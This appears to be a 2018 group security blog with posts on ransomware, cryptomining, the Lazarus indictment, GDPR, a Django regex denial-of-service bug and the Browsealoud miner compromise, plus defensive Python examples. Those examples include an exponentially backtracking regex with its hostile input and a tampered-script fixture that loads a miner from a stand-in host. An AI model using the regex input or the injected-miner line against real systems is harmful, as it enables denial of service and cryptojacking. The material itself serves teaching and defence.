Cryptocurrency mining malware, Ransomware, and who is at risk

By: Chase Alexander

9/11/2018

It is no secret that hackers are trying to gain something when they carry out an attack on a target, usually money. However, the way they do this can vary. It does not always mean stealing credit card numbers or bank account logins. Another way to profit from hacked targets is cryptocurrency mining malware. There is also malware that locks up a system until a ransom is paid. Today I would like to look at three things: ransomware, cryptocurrency mining malware, and who is at the greatest risk for these kinds of attacks.

First I am going to examine ransomware. This is an interesting case, because ransomware has been around for a long time; what is relatively new is the targeted form described in the Sophos article, which emerged around 2016. You would think it would have been stopped by now, and you would be partly right. The days of spreading ransomware through spam campaigns and worm-style outbreaks, where the philosophy was to cast as wide a net as possible and see what you catch, have largely given way to targeted attacks on a single organization or individual. The goal of doing ransomware this way is to carry out one strong attack that yields more than many weaker attacks would. So how do they work? The attacker gains entry to a system through weak Remote Desktop Protocol (RDP) passwords, typically by guessing them against an RDP service exposed to the internet. They escalate their privileges to administrator, use those privileges to disable or bypass security software, spread the ransomware to encrypt files on the system and anything it can reach, and finally leave a message with the ultimatum: "If you want your files decrypted, contact us by email or through a dark web site." Then they wait. If the victim pays the ransom, the attack was a success. If the victim does not pay, it costs the attacker almost nothing; they just move on to the next target and try again.
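The first stage of that chain, password guessing against RDP, is the one a defender can see in logs before any encryption happens. The following is an added example, not code from the article or from the Sophos source: it runs a sliding-window count of failed Remote Desktop logons per source IP over a constructed, simplified log and marks the IPs that later logged on successfully. The record format, IP addresses and usernames are made up for the example; the event IDs (4625 failed logon, 4624 successful logon) and logon type 10 (RemoteInteractive) are the real Windows Security log values.

```python
"""Added example (not from the article or the Sophos source): spotting the
RDP password-guessing stage of a targeted ransomware intrusion in constructed
Windows Security log records."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records, simplified to
# "timestamp,event_id,logon_type,source_ip,user".
# In the real Windows Security log, event 4625 is a failed logon and 4624 a
# successful one; logon type 10 (RemoteInteractive) is a Remote Desktop session.
SAMPLE_LOG = """\
2018-09-10T02:00:01,4625,10,203.0.113.7,administrator
2018-09-10T02:00:03,4625,10,203.0.113.7,admin
2018-09-10T02:00:04,4625,10,203.0.113.7,Administrator
2018-09-10T02:00:06,4625,10,203.0.113.7,backup
2018-09-10T02:00:07,4625,10,203.0.113.7,Administrator
2018-09-10T02:00:09,4624,10,203.0.113.7,Administrator
2018-09-10T02:15:00,4625,10,198.51.100.4,jsmith
2018-09-10T02:16:30,4624,10,198.51.100.4,jsmith
2018-09-10T03:00:00,4625,10,192.0.2.9,alice
2018-09-10T03:40:00,4625,10,192.0.2.9,alice
"""


def parse_records(log_text):
    """Yield (timestamp, event_id, logon_type, source_ip, user) per record."""
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, ip, user = line.split(",")
        yield datetime.fromisoformat(ts), int(event_id), int(logon_type), ip, user


def detect_rdp_password_guessing(log_text, threshold=5,
                                 window=timedelta(minutes=10), logon_types=(10,)):
    """Flag source IPs with >= threshold failed RDP logons inside a sliding window.

    Returns {ip: {"failures": n, "distinct_users": k, "succeeded": bool}}.
    "succeeded" is set when the same IP later logs on successfully, which is
    the pattern that precedes the privilege-escalation and encryption stages.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps inside the window
    total = defaultdict(int)      # ip -> all failures seen
    users = defaultdict(set)      # ip -> usernames tried
    alerts = {}
    for ts, event_id, logon_type, ip, user in parse_records(log_text):
        if logon_type not in logon_types:
            continue
        if event_id == 4625:
            q = recent[ip]
            q.append(ts)
            while q and ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            total[ip] += 1
            users[ip].add(user)
            if len(q) >= threshold:
                entry = alerts.setdefault(ip, {"succeeded": False})
                entry["failures"] = total[ip]
                entry["distinct_users"] = len(users[ip])
        elif event_id == 4624 and ip in alerts:
            alerts[ip]["succeeded"] = True    # guessing followed by a login: top priority
    return alerts


if __name__ == "__main__":
    for ip, info in detect_rdp_password_guessing(SAMPLE_LOG).items():
        print(ip, info)
```

On the sample data only 203.0.113.7 trips the rule: five failures across four usernames in six seconds, followed by a successful Administrator logon. One user mistyping a password once, or two failures forty minutes apart, does not. A caveat when applying this to real logs: when Network Level Authentication is enabled, failed RDP attempts are often recorded with logon type 3 (network) rather than 10, so pass `logon_types=(3, 10)` or the guessing phase will be invisible to the rule.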

The other form of attack that is of interest is cryptocurrency mining malware. This attack takes over a machine and uses it to mine cryptocurrency for the hacker. It is very different because it requires no interaction between the hacker and the victim. Unlike the previous method, this one lets the hacker try to remain undetected. With ransomware, the victim has the choice to either give up their machine and data or give in to the hacker. This method gives the victim no choice at all; if they do not notice their computer fan running louder, they will have no idea they have been hacked. On top of that, cryptocurrency is pseudonymous and largely unregulated, so once the hacker has it, it is far harder to trace or claw back than a bank transfer. If a hacker steals bank account credentials, there are still real difficulties in actually getting at the money in those accounts. A drawback of mining, however, is that the profits are not immediate; they take time to accrue. If ransomware succeeds, the profit arrives all at once.

So who is at risk for these attacks? Ransomware attacks are targeted attacks. They go after one group or individual, who will have to give up money to get their data back. It is as simple as this: if you do not have money or credit, you are at very low risk of this attack. The goal of ransomware is to collect a ransom, so a hacker will go after someone they know can pay. They are not going to go after the poor, who have very little to offer. A cryptomining attack, however, can happen to anybody. You do not need money or credit; if you have a computer, it can be used to mine cryptocurrency. In terms of large-scale impact we can look at Vietnam: last year malware cost Vietnam 12.3 trillion VND, the equivalent of about 540 million USD.

 

Sources:

  1. https://e.vnexpress.net/news/news/vietnam-vulnerable-as-new-cyber-security-threat-emerges-3804240.html
  2. https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29
  3. https://www.zdnet.com/article/cryptocurrency-mining-malware-why-it-is-such-a-menace-and-where-its-going-next/

Connections with the Lazarus group and North Korea

Just recently, Park Jin Hyok was indicted by the United States on charges of conspiracy to commit computer fraud and abuse and conspiracy to commit wire fraud. While the indictment itself does little more than name one person who was partly responsible for some major cyber attacks around the world since 2014, it helped start to draw a line between the Lazarus Group and the government of North Korea. Furthermore, the investigation behind it can lead to the exposure of other members of the Lazarus Group. To give a little background on what the Lazarus Group is capable of, it takes a bit of history of the attacks they have carried out. In 2014 there was the hack on Sony Pictures over the controversial movie "The Interview". Next, in 2016, there was the theft of $81 million from Bangladesh Bank. In 2017 came WannaCry, which hit well over 200,000 computers at hospitals, corporations, and government agencies in 150 countries within a few days.


But how could one hacker from this group lead to the unmasking of such a sophisticated group? While a large email infrastructure is useful for phishing and gives the impression that operations can be kept separate and secret, it was also a big part of why the US government was able to map that infrastructure at all. That, and they got lucky: a purported supervisor sent out a resume and a report on how the "company" was doing, the company being Chosun Expo Joint Venture. With the Gmail accounts now exposed, Eric Chien of Symantec Corp. expects attacks from the Lazarus Group to pause, at least for a while. While this is hardly a closed case or the takedown of an organization, it is a spark that can light up the shadowy Lazarus Group.

– Andres Orbe

Sources:

New European Privacy Standards Coming into Effect

Two years ago the European Union passed the General Data Protection Regulation (GDPR); on May 25th, 2018, those rules become enforceable. The GDPR aims to increase the privacy controls users have on the web through new privacy standards. Although the regulation was passed by the EU, the international nature of the web means people all over the world will feel its impact.

These regulations aim to increase user privacy by expanding the scope of the consent that sites are required to request. First, consent has to be explicitly given for each specific use of the data a customer provides, meaning web services must implement granular permission systems. The user must be told exactly what the data is being used for and has a right to access all the information the company holds on them. Companies must also be able to prove that consent was given for a particular use of data. Second, a user must be able to withdraw their consent at any time. Lastly, all users have the right to be forgotten: a user can request that any data associated with them be permanently erased from the company's databases.

It is unknown at this time how aggressively the EU will enforce these provisions. However, breaking any of them carries large penalties on a per-violation basis. These rules could change the global playing field, as many advertising, social media, and other businesses that rely heavily on data collection will be massively affected.

https://www.theverge.com/2018/3/28/17172548/gdpr-compliance-requirements-privacy-notice

https://www.cnbc.com/2018/03/30/gdpr-everything-you-need-to-know.html

https://www.huntonprivacyblog.com/2017/12/15/article-29-working-party-publishes-guidance-on-consent-under-the-gdpr/

Sanitize your strings, kiddos

Trusting user-supplied strings has always been a problem in computing. Users will always find a way to break your application with some kind of weird input. Programmers have found ways to deal with this, such as parameterizing SQL statements, escaping special characters, or simply returning an error on unexpected text. However, with the rise of the internet and the availability of tooling, attackers have gotten smarter about the way they attack inputs.

In the last month or so, Django found this out in its django.utils.text.Truncator class. This class has two methods, chars() and words(), which truncate a string to a given number of characters or words.

Users wanted a way to truncate HTML without leaving broken tags behind, so Django added an html keyword argument to those methods, which makes them treat the input as HTML. However, a regular expression in those code paths was prone to catastrophic backtracking, so a malicious user could supply specially crafted HTML that took an extremely long time to process. A handful of such requests would tie up the web server and deny service to other users. Uh-oh.
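To make the failure mode concrete, here is an added example (not Django's code, and not the exact pattern that was in Truncator): a regular expression with nested quantifiers whose running time doubles with every extra input character, next to a linear-time HTML character truncator built on the standard library's HTMLParser that does the job without a regex at all. The sample HTML strings and the `truncate_html_chars` function name are mine.

```python
"""Added example (not Django's code): a regular expression that backtracks
catastrophically, beside an HTML truncator that runs in linear time."""
import re
import time
from html.parser import HTMLParser

# Nested quantifiers over the same characters are the classic trap: on
# "aaaa...a!" the engine tries every way of splitting the a's between the
# inner and outer groups before giving up, so the work doubles per character.
VULNERABLE_RE = re.compile(r"^(a+)+$")
# Same language, one quantifier: the engine scans the input once and fails.
SAFE_RE = re.compile(r"^a+$")


def time_match(pattern, n):
    """Return (matched, seconds) for pattern run against n a's plus a '!'."""
    subject = "a" * n + "!"
    start = time.perf_counter()
    matched = pattern.match(subject) is not None
    return matched, time.perf_counter() - start


def backtracking_growth(small=10, big=18):
    """Seconds the vulnerable pattern needs at two input sizes; the ratio is
    roughly 2 ** (big - small)."""
    return time_match(VULNERABLE_RE, small)[1], time_match(VULNERABLE_RE, big)[1]


VOID_TAGS = {"br", "hr", "img", "input", "meta", "link"}


class _CharTruncator(HTMLParser):
    """Stream the HTML once, count only visible characters, and remember which
    tags are open so they can be closed after the cut."""

    def __init__(self, limit):
        super().__init__(convert_charrefs=False)  # keep &amp; etc. encoded
        self.limit, self.count = limit, 0
        self.parts, self.open_tags, self.done = [], [], False

    def handle_starttag(self, tag, attrs):
        if self.done:
            return
        self.parts.append(self.get_starttag_text())
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.done or tag not in self.open_tags:
            return
        while self.open_tags:           # close up to and including the match
            closed = self.open_tags.pop()
            self.parts.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if self.done:
            return
        room = self.limit - self.count
        if len(data) <= room:
            self.parts.append(data)
            self.count += len(data)
        else:
            self.parts.append(data[:room] + "...")
            self.done = True

    def handle_entityref(self, name):
        self._atom(f"&{name};")

    def handle_charref(self, name):
        self._atom(f"&#{name};")

    def _atom(self, text):
        """An entity or character reference counts as one visible character."""
        if self.done:
            return
        if self.count < self.limit:
            self.parts.append(text)
            self.count += 1
        else:
            self.parts.append("...")
            self.done = True

    def result(self):
        return "".join(self.parts) + "".join(f"</{t}>" for t in reversed(self.open_tags))


def truncate_html_chars(html, limit):
    """Truncate html to `limit` visible characters, closing any open tags."""
    parser = _CharTruncator(limit)
    parser.feed(html)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    print(truncate_html_chars("<p>Hello <b>brave new</b> world</p>", 11))
    print("vulnerable pattern, n=10 vs n=18 seconds:", backtracking_growth())
```

Run `backtracking_growth()` with `big` a few characters larger and the vulnerable pattern goes from milliseconds to minutes, which is exactly what the Django report describes: the attacker controls the input length, so a regex whose cost is exponential in it is a denial-of-service waiting to happen. The truncator, by contrast, touches each character once regardless of how the tags are nested.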

Looking at the CVE, you can see the security community scored it a 5, which on the 0-to-10 CVSS scale is a medium rating, not the highest. Needless to say, Django quickly patched the issue and shipped a security release.

The moral of the story is that security vulnerabilities can happen to anyone, and you should know what the framework you are using is actually doing instead of blindly trusting that it will work. Be aware of security in your everyday life.

— Kyle Kaniecki

Over 4,200 Websites Compromised with a Cryptominer

On Sunday, February 11, 2018, a little over 4,200 websites, including government websites in the U.K. and U.S., were found to be serving a cryptominer. Users who visited these sites were made to mine a cryptocurrency called Monero through a compromised JavaScript library, Browsealoud. The library had been modified to include Coinhive, a JavaScript-based cryptominer built specifically for mining Monero.

Browsealoud is a library developed by Texthelp that adds text-to-speech functionality to any website that embeds it. It is not clear how the Browsealoud library was modified. It is hosted in an Amazon S3 bucket, and since S3 itself is well protected, the likeliest explanation is that someone obtained credentials with write access to the bucket, for example through a leak or phishing.

There is no clear answer for what the public can do to prevent this in the future. You could use a script-blocking extension, but if you had already allowed scripts on the site, the miner would have been allowed too, since it was embedded in the Browsealoud code itself rather than loaded from a separate domain you could block.

Instead of being able to take our security into our own hands, we are stuck depending on the developers of the websites we visit to implement Subresource Integrity (SRI). With SRI, the page carries a cryptographic hash of the script it expects to load; the browser hashes the fetched script and refuses to run it if the hashes do not match. Current versions of Google Chrome, Mozilla Firefox, and Opera all support SRI, but few sites use it.
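What that looks like in practice, as an added example that is neither Texthelp's code nor a browser's implementation: the helper below computes the `integrity` value a site would publish for a script and then applies the browser's matching rule to a fetched copy, including the rule that a tampered copy fails and the less obvious rule that an attribute with no recognisable hash is silently not enforced. The script contents and the hostname are constructed for the example.

```python
"""Added example (not Texthelp's code and not a browser implementation):
generating the Subresource Integrity attribute for a script and checking a
fetched copy against it."""
import base64
import hashlib

# Algorithms SRI accepts, weakest to strongest.
ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Build an integrity token: '<algorithm>-<base64 digest>'."""
    if algorithm not in ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algorithm}")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(content: bytes, integrity: str) -> bool:
    """Apply the browser's rule to a fetched resource.

    The attribute may carry several space-separated tokens. Only tokens whose
    algorithm the browser knows count; among those, the strongest algorithm
    wins, and the resource passes if its digest matches any token of that
    algorithm. Caveat: if no token is recognised (say, a typo such as
    'sha-384-...'), browsers load the resource unchecked, so this function
    does the same; lint your templates for that case.
    """
    by_algorithm = {}
    for token in integrity.split():
        algorithm, sep, digest = token.partition("-")
        if sep and algorithm in ALGORITHMS:
            # the spec allows trailing '?options'; ignore them
            by_algorithm.setdefault(algorithm, set()).add(digest.split("?", 1)[0])
    if not by_algorithm:
        return True  # no usable metadata: browsers do not block here
    strongest = max(by_algorithm, key=ALGORITHMS.index)
    actual = sri_hash(content, strongest).split("-", 1)[1]
    return actual in by_algorithm[strongest]


def script_tag(src: str, content: bytes) -> str:
    """The tag a site would publish. crossorigin is required for a script on
    another origin: without it the response is opaque to the page, the hash
    cannot be checked, and the browser blocks the script."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            'crossorigin="anonymous"></script>')


# Constructed stand-ins for the published library and a tampered copy.
ORIGINAL_SCRIPT = b"window.readAloud = function (text) { console.log('reading: ' + text); };\n"
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + b"new Worker('https://example.invalid/miner.js');\n"

if __name__ == "__main__":
    print(script_tag("https://cdn.example.invalid/lib.js", ORIGINAL_SCRIPT))
    print("original passes:", verify_sri(ORIGINAL_SCRIPT, sri_hash(ORIGINAL_SCRIPT)))
    print("tampered passes:", verify_sri(TAMPERED_SCRIPT, sri_hash(ORIGINAL_SCRIPT)))
```

The catch for a site that embeds a third-party library is operational rather than technical: the hash pins one exact version of the file, so every legitimate update by the vendor breaks the page until the tag is regenerated. That is the trade-off the thousands of Browsealoud customers were implicitly making by loading whatever the S3 bucket served.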

– Zachary Campanella

Sources:

https://www.databreachtoday.com/government-websites-deliver-cryptocurrency-mining-code-a-10643

https://www.theguardian.com/technology/2018/feb/11/government-websites-hit-by-cryptocurrency-mining-malware

https://www.engadget.com/2018/02/11/government-websites-victims-of-cryptocurrency-mining-hijack/

https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity